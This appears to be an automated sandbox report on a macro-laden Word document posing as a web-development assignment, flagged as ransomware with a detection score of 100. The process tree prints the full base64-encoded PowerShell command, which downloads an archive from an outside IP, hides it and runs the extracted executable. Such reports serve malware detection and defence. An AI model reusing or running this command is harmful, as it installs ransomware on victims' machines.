Edit tour
Windows
Analysis Report
em_webdev_assignment_dec2024.doc
Overview
General Information
| Sample name: | em_webdev_assignment_dec2024.doc |
| Analysis ID: | 1579175 |
| MD5: | f6029da9935b2b83ecf0194611a31207 |
| SHA1: | 91e33bf7a512ace86fc4394a1761d03195d47787 |
| SHA256: | 6fa7a912d145bc6a446c6882983981b3ceb91b50090dc0eadd1a7f77d70c6cac |
| Tags: | docuser-smica83 |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious encrypted Powershell command line found
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Office process queries suspicious COM object (likely to drop second stage)
Powershell drops PE file
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes a notice file (html or txt) to demand a ransom
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64
WINWORD.EXE (PID: 1620 cmdline: "C:\Progra m Files (x 86)\Micros oft Office \Root\Offi ce16\WINWO RD.EXE" /A utomation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678) 
powershell.exe (PID: 7268 cmdline: C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe -e JAB1AHIAb AAgAD0AIAA iAGgAdAB0A HAAOgAvAC8 AOQAxAC4AM gAwADgALgA yADAANgAuA DEAOQA1AC8 AZAAvAGEAc wBzAGkAZwB uAG0AZQBuA HQALgB6AGk AcAAiADsAJ ABwAGEAdAB oACAAPQAgA CIAQwA6AFw AVQBzAGUAc gBzAFwAJAB lAG4AdgA6A HUAcwBlAHI AbgBhAG0AZ QBcAHAANAB 5AHgAMAByA GwAMABzADM AIgA7AG0Aa wBkAGkAcgA gACQAcABhA HQAaAA7AFM AZQB0AC0AS QB0AGUAbQB QAHIAbwBwA GUAcgB0AHk AIAAtAFAAY QB0AGgAIAA kAHAAYQB0A GgAIAAtAE4 AYQBtAGUAI ABBAHQAdAB yAGkAYgB1A HQAZQBzACA ALQBWAGEAb AB1AGUAIAA oAFsAUwB5A HMAdABlAG0 ALgBJAE8AL gBGAGkAbAB lAEEAdAB0A HIAaQBiAHU AdABlAHMAX QA6ADoASAB pAGQAZABlA G4AKQA7ACg ATgBlAHcAL QBPAGIAagB lAGMAdAAgA E4AZQB0AC4 AVwBlAGIAQ wBsAGkAZQB uAHQAKQAuA EQAbwB3AG4 AbABvAGEAZ ABGAGkAbAB lACgAJAB1A HIAbAAsACA AJABwAGEAd ABoACAAKwA gACIAXABhA HMAcwBpAGc AbgBtAGUAb gB0AC4AegB pAHAAIgApA DsARQB4AHA AYQBuAGQAL QBBAHIAYwB oAGkAdgBlA CAALQBQAGE AdABoACAAI gAkAHAAYQB 0AGgAXABhA HMAcwBpAGc AbgBtAGUAb gB0AC4AegB pAHAAIgAgA C0ARABlAHM AdABpAG4AY QB0AGkAbwB uAFAAYQB0A GgAIAAiACQ AcABhAHQAa ABcAGEAcwB zAGkAZwBuA G0AZQBuAHQ AKAAyACkAI gA7AEUAeAB wAGEAbgBkA C0AQQByAGM AaABpAHYAZ QAgAC0AUAB hAHQAaAAgA CIAJABwAGE AdABoAFwAY QBzAHMAaQB nAG4AbQBlA G4AdAAoADI AKQBcAGEAc wBzAGkAZwB uAG0AZQBuA HQAKAAyACk ALgB6AGkAc AAiACAALQB EAGUAcwB0A GkAbgBhAHQ AaQBvAG4AU ABhAHQAaAA gACIAJABwA GEAdABoACI AOwBjAGQAI AAkAHAAYQB 0AGgAOwBTA HQAYQByAHQ ALQBQAHIAb wBjAGUAcwB zACAAIgByA HUAbgAuAGU AeABlACIAI AAtAFcAaQB uAGQAbwB3A FMAdAB5AGw AZQAgAEgAa QBkAGQAZQB uAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 7284 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
run.exe (PID: 7724 cmdline: "C:\Users\ user\p4yx0 rl0s3\run. exe" MD5: CD860C78E0374DEC3A2B1A73507FCE4A) - conhost.exe (PID: 7732 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7804 cmdline:
"cmd" /c s tart "" "C :\Users\us er\p4yx0rl 0s3\note.t xt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7812 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - notepad.exe (PID: 7928 cmdline:
"C:\Window s\system32 \NOTEPAD.E XE" C:\Use rs\user\p4 yx0rl0s3\n ote.txt MD5: 27F71B12CB585541885A31BE22F61C83)
- run.exe (PID: 5740 cmdline:
"C:\Users\ user\p4yx0 rl0s3\run. exe" MD5: CD860C78E0374DEC3A2B1A73507FCE4A) - conhost.exe (PID: 4476 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7240 cmdline:
"cmd" /c s tart "" "C :\Users\us er\p4yx0rl 0s3\note.t xt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7260 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - notepad.exe (PID: 7388 cmdline:
"C:\Window s\system32 \NOTEPAD.E XE" C:\Use rs\user\p4 yx0rl0s3\n ote.txt MD5: 27F71B12CB585541885A31BE22F61C83)
- run.exe (PID: 5104 cmdline:
"C:\Users\ user\p4yx0 rl0s3\run. exe" MD5: CD860C78E0374DEC3A2B1A73507FCE4A) - conhost.exe (PID: 7564 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7660 cmdline:
"cmd" /c s tart "" "C :\Users\us er\p4yx0rl 0s3\note.t xt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7392 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - notepad.exe (PID: 7692 cmdline:
"C:\Window s\system32 \NOTEPAD.E XE" C:\Use rs\user\p4 yx0rl0s3\n ote.txt MD5: 27F71B12CB585541885A31BE22F61C83)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||